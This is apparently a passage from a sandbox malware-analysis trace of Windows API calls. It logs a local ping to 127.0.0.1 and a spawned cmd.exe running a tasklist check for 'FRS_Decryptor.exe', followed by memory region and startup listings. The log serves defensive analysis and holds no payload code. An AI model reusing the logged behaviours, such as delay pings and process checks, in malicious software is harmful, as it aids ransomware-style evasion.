cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0079.609] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x328a60 [0079.609] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x328a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0079.609] _fileno (_File=0x76ea4c28) returned 1 [0079.609] _write (in: _FileHandle=1, _Buf=0x328a60*, _MaxCharCount=0x9 | out: _Buf=0x328a60*) returned 9 [0079.609] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0079.609] _fileno (_File=0x76ea4c28) returned 1 [0079.609] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0079.609] LocalFree (hMem=0x328a60) returned 0x0 [0079.609] LocalFree (hMem=0x337fa0) returned 0x0 [0079.610] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x16f4f8, nSize=0x0, Arguments=0x16f4f4 | out: lpBuffer="羠3ﻌ\x16⟘\x94䰨盪✨") returned 0x9 [0079.610] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0079.610] _fileno (_File=0x76ea4c28) returned 1 [0079.610] _get_osfhandle (_FileHandle=1) returned 0x28 [0079.610] GetFileType (hFile=0x28) returned 0x2 [0079.610] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x16f4bc | out: lpMode=0x16f4bc) returned 0 [0079.610] GetLastError () returned 0x6 [0079.610] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x16f420, nSize=0x50 | out: lpBuffer="\x16✨") returned 0x0 [0079.610] _fileno (_File=0x76ea4c28) returned 1 [0079.610] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0079.610] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0079.610] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x328940 [0079.610] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x328940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0079.610] _fileno (_File=0x76ea4c28) returned 1 [0079.610] _write (in: _FileHandle=1, _Buf=0x328940*, _MaxCharCount=0x9 | out: _Buf=0x328940*) returned 9 [0079.610] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0079.610] _fileno (_File=0x76ea4c28) returned 1 [0079.610] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0079.610] LocalFree (hMem=0x328940) returned 0x0 [0079.610] LocalFree (hMem=0x337fa0) returned 0x0 [0079.610] Sleep (dwMilliseconds=0x3e8) [0080.622] IcmpSendEcho2Ex (in: IcmpHandle=0x326b80, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x32c4d0, RequestSize=0x20, RequestOptions=0x16f574, ReplyBuffer=0x335270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x335270) returned 0x1 [0080.623] InetNtopW (in: Family=2, pAddr=0x16f564, pStringBuf=0x16f68c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0080.623] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x16f4f8, nSize=0x0, Arguments=0x16f4f4 | out: lpBuffer="羠3ﻌ\x16⛔\x94䰨盪✣") returned 0x16 [0080.623] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0080.623] _fileno (_File=0x76ea4c28) returned 1 [0080.623] _get_osfhandle (_FileHandle=1) returned 0x28 [0080.623] GetFileType (hFile=0x28) returned 0x2 [0080.623] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x16f4bc | out: lpMode=0x16f4bc) returned 0 [0080.623] GetLastError () returned 0x6 [0080.623] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x16f420, nSize=0x50 | out: lpBuffer="\x16✣") returned 0x0 [0080.623] _fileno (_File=0x76ea4c28) returned 1 [0080.623] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0080.623] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0080.623] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x337fd8 [0080.623] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x337fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0080.623] _fileno (_File=0x76ea4c28) returned 1 [0080.623] _write (in: _FileHandle=1, _Buf=0x337fd8*, _MaxCharCount=0x16 | out: _Buf=0x337fd8*) returned 22 [0080.623] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0080.623] _fileno (_File=0x76ea4c28) returned 1 [0080.623] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0080.623] LocalFree (hMem=0x337fd8) returned 0x0 [0080.623] LocalFree (hMem=0x337fa0) returned 0x0 [0080.623] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x16f4f8, nSize=0x0, Arguments=0x16f4f4 | out: lpBuffer="羠3ﻌ\x16⛿\x94䰨盪✼") returned 0x9 [0080.624] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0080.624] _fileno (_File=0x76ea4c28) returned 1 [0080.624] _get_osfhandle (_FileHandle=1) returned 0x28 [0080.624] GetFileType (hFile=0x28) returned 0x2 [0080.624] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x16f4bc | out: lpMode=0x16f4bc) returned 0 [0080.624] GetLastError () returned 0x6 [0080.624] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x16f420, nSize=0x50 | out: lpBuffer="\x16✼") returned 0x0 [0080.624] _fileno (_File=0x76ea4c28) returned 1 [0080.624] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0080.624] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0080.624] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3289a0 [0080.624] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x3289a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0080.624] _fileno (_File=0x76ea4c28) returned 1 [0080.624] _write (in: _FileHandle=1, _Buf=0x3289a0*, _MaxCharCount=0x9 | out: _Buf=0x3289a0*) returned 9 [0080.624] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0080.624] _fileno (_File=0x76ea4c28) returned 1 [0080.624] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0080.624] LocalFree (hMem=0x3289a0) returned 0x0 [0080.624] LocalFree (hMem=0x337fa0) returned 0x0 [0080.624] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x16f4fc, nSize=0x0, Arguments=0x16f4f8 | out: lpBuffer="羠3ﻌ\x16➷\x94䰨盪✧") returned 0x9 [0080.624] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0080.624] _fileno (_File=0x76ea4c28) returned 1 [0080.624] _get_osfhandle (_FileHandle=1) returned 0x28 [0080.624] GetFileType (hFile=0x28) returned 0x2 [0080.624] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x16f4c0 | out: lpMode=0x16f4c0) returned 0 [0080.624] GetLastError () returned 0x6 [0080.624] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x16f424, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0080.624] _fileno (_File=0x76ea4c28) returned 1 [0080.624] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0080.624] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0080.624] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x328a60 [0080.624] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x328a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0080.624] _fileno (_File=0x76ea4c28) returned 1 [0080.624] _write (in: _FileHandle=1, _Buf=0x328a60*, _MaxCharCount=0x9 | out: _Buf=0x328a60*) returned 9 [0080.624] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0080.624] _fileno (_File=0x76ea4c28) returned 1 [0080.624] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0080.624] LocalFree (hMem=0x328a60) returned 0x0 [0080.624] LocalFree (hMem=0x337fa0) returned 0x0 [0080.624] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x16f4f8, nSize=0x0, Arguments=0x16f4f4 | out: lpBuffer="羠3ﻌ\x16⟘\x94䰨盪✨") returned 0x9 [0080.624] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0080.624] _fileno (_File=0x76ea4c28) returned 1 [0080.624] _get_osfhandle (_FileHandle=1) returned 0x28 [0080.624] GetFileType (hFile=0x28) returned 0x2 [0080.624] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x16f4bc | out: lpMode=0x16f4bc) returned 0 [0080.624] GetLastError () returned 0x6 [0080.624] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x16f420, nSize=0x50 | out: lpBuffer="\x16✨") returned 0x0 [0080.624] _fileno (_File=0x76ea4c28) returned 1 [0080.624] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0080.624] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0080.624] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3289b8 [0080.624] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x3289b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0080.625] _fileno (_File=0x76ea4c28) returned 1 [0080.625] _write (in: _FileHandle=1, _Buf=0x3289b8*, _MaxCharCount=0x9 | out: _Buf=0x3289b8*) returned 9 [0080.625] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0080.625] _fileno (_File=0x76ea4c28) returned 1 [0080.625] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0080.625] LocalFree (hMem=0x3289b8) returned 0x0 [0080.625] LocalFree (hMem=0x337fa0) returned 0x0 [0080.625] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x16f480, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0080.625] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x16f454, nSize=0x0, Arguments=0x16f450 | out: lpBuffer="羠3\x16᧰\x94䰨盪❏") returned 0x5c [0080.625] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0080.625] _fileno (_File=0x76ea4c28) returned 1 [0080.625] _get_osfhandle (_FileHandle=1) returned 0x28 [0080.625] GetFileType (hFile=0x28) returned 0x2 [0080.625] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x16f418 | out: lpMode=0x16f418) returned 0 [0080.625] GetLastError () returned 0x6 [0080.625] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x16f37c, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0080.625] _fileno (_File=0x76ea4c28) returned 1 [0080.625] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0080.625] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0080.625] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0x338068 [0080.625] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x338068, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0080.625] _fileno (_File=0x76ea4c28) returned 1 [0080.625] _write (in: _FileHandle=1, _Buf=0x338068*, _MaxCharCount=0x5c | out: _Buf=0x338068*) returned 92 [0080.625] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0080.625] _fileno (_File=0x76ea4c28) returned 1 [0080.625] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0080.625] LocalFree (hMem=0x338068) returned 0x0 [0080.625] LocalFree (hMem=0x337fa0) returned 0x0 [0080.625] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x16f460, nSize=0x0, Arguments=0x16f45c | out: lpBuffer="羠3\x16ᨧ\x94䰨盪❓") returned 0x61 [0080.625] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0080.625] _fileno (_File=0x76ea4c28) returned 1 [0080.625] _get_osfhandle (_FileHandle=1) returned 0x28 [0080.625] GetFileType (hFile=0x28) returned 0x2 [0080.625] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x16f424 | out: lpMode=0x16f424) returned 0 [0080.625] GetLastError () returned 0x6 [0080.625] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x16f388, nSize=0x50 | out: lpBuffer="\x16❓") returned 0x0 [0080.625] _fileno (_File=0x76ea4c28) returned 1 [0080.625] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0080.625] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0080.625] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0x338070 [0080.625] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x338070, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0080.625] _fileno (_File=0x76ea4c28) returned 1 [0080.625] _write (in: _FileHandle=1, _Buf=0x338070*, _MaxCharCount=0x61 | out: _Buf=0x338070*) returned 97 [0080.625] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0080.625] _fileno (_File=0x76ea4c28) returned 1 [0080.625] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0080.625] LocalFree (hMem=0x338070) returned 0x0 [0080.625] LocalFree (hMem=0x337fa0) returned 0x0 [0080.625] IcmpCloseHandle (IcmpHandle=0x326b80) returned 1 [0080.626] LocalFree (hMem=0x32c4d0) returned 0x0 [0080.626] LocalFree (hMem=0x335270) returned 0x0 [0080.626] WSACleanup () returned 0 [0080.626] exit (_Code=0) Thread: id = 197 os_tid = 0xb8c Thread: id = 198 os_tid = 0xb88 Process: id = "62" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x112e4000" os_pid = "0xb94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3344 start_va = 0x740000 end_va = 0x75ffff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 3345 start_va = 0x760000 end_va = 0x761fff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 3346 start_va = 0x770000 end_va = 0x77efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 3347 start_va = 0x780000 end_va = 0x7bffff entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 3348 start_va = 0x7c0000 end_va = 0x8bffff entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 3349 start_va = 0x8c0000 end_va = 0x8c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 3350 start_va = 0x8d0000 end_va = 0x8d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 3351 start_va = 0x8e0000 end_va = 0x8e1fff entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 3352 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 3353 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3354 start_va = 0x7e980000 end_va = 0x7e9a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e980000" filename = "" Region: id = 3355 start_va = 0x7e9a4000 end_va = 0x7e9a4fff entry_point = 0x0 region_type = private name = "private_0x000000007e9a4000" filename = "" Region: id = 3356 start_va = 0x7e9a6000 end_va = 0x7e9a6fff entry_point = 0x0 region_type = private name = "private_0x000000007e9a6000" filename = "" Region: id = 3357 start_va = 0x7e9ad000 end_va = 0x7e9affff entry_point = 0x0 region_type = private name = "private_0x000000007e9ad000" filename = "" Region: id = 3358 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3359 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3360 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3361 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 3362 start_va = 0x9c0000 end_va = 0x9cffff entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 3363 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3364 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3365 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3366 start_va = 0x740000 end_va = 0x74ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 3367 start_va = 0x8f0000 end_va = 0x96dfff entry_point = 0x8f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3368 start_va = 0xaf0000 end_va = 0xbeffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 3369 start_va = 0xd70000 end_va = 0xd7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d70000" filename = "" Region: id = 3370 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3371 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3372 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3373 start_va = 0x7e880000 end_va = 0x7e97ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e880000" filename = "" Region: id = 3374 start_va = 0x750000 end_va = 0x753fff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 3375 start_va = 0xd80000 end_va = 0x1054fff entry_point = 0xd80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3394 start_va = 0x760000 end_va = 0x763fff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Thread: id = 199 os_tid = 0xb90 [0080.654] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0080.654] __set_app_type (_Type=0x1) [0080.654] __p__fmode () returned 0x76ea1768 [0080.654] __p__commode () returned 0x76ea176c [0080.654] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0080.655] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0080.655] GetCurrentThreadId () returned 0xb90 [0080.655] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb90) returned 0x34 [0080.655] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0080.655] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0080.655] SetThreadUILanguage (LangId=0x0) returned 0x409 [0080.656] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0080.656] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x8bfdd4 | out: phkResult=0x8bfdd4*=0x0) returned 0x2 [0080.657] VirtualQuery (in: lpAddress=0x8bfde3, lpBuffer=0x8bfd7c, dwLength=0x1c | out: lpBuffer=0x8bfd7c*(BaseAddress=0x8bf000, AllocationBase=0x7c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0080.657] VirtualQuery (in: lpAddress=0x7c0000, lpBuffer=0x8bfd7c, dwLength=0x1c | out: lpBuffer=0x8bfd7c*(BaseAddress=0x7c0000, AllocationBase=0x7c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0080.657] VirtualQuery (in: lpAddress=0x7c1000, lpBuffer=0x8bfd7c, dwLength=0x1c | out: lpBuffer=0x8bfd7c*(BaseAddress=0x7c1000, AllocationBase=0x7c0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0080.657] VirtualQuery (in: lpAddress=0x7c3000, lpBuffer=0x8bfd7c, dwLength=0x1c | out: lpBuffer=0x8bfd7c*(BaseAddress=0x7c3000, AllocationBase=0x7c0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0080.657] VirtualQuery (in: lpAddress=0x8c0000, lpBuffer=0x8bfd7c, dwLength=0x1c | out: lpBuffer=0x8bfd7c*(BaseAddress=0x8c0000, AllocationBase=0x8c0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0080.657] GetConsoleOutputCP () returned 0x1b5 [0080.657] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0080.657] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0080.657] _get_osfhandle (_FileHandle=1) returned 0x34c [0080.657] SetConsoleMode (hConsoleHandle=0x34c, dwMode=0x0) returned 0 [0080.657] _get_osfhandle (_FileHandle=1) returned 0x34c [0080.657] GetConsoleMode (in: hConsoleHandle=0x34c, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0080.657] _get_osfhandle (_FileHandle=0) returned 0x24 [0080.657] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0080.657] GetEnvironmentStringsW () returned 0xaf40c0* [0080.658] FreeEnvironmentStringsA (penv="=") returned 1 [0080.658] GetEnvironmentStringsW () returned 0xaf40c0* [0080.658] FreeEnvironmentStringsA (penv="=") returned 1 [0080.658] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x8bed24 | out: phkResult=0x8bed24*=0x44) returned 0x0 [0080.658] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x8bed2c, lpData=0x8bed30, lpcbData=0x8bed28*=0x1000 | out: lpType=0x8bed2c*=0x0, lpData=0x8bed30*=0x0, lpcbData=0x8bed28*=0x1000) returned 0x2 [0080.658] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x8bed2c, lpData=0x8bed30, lpcbData=0x8bed28*=0x1000 | out: lpType=0x8bed2c*=0x4, lpData=0x8bed30*=0x1, 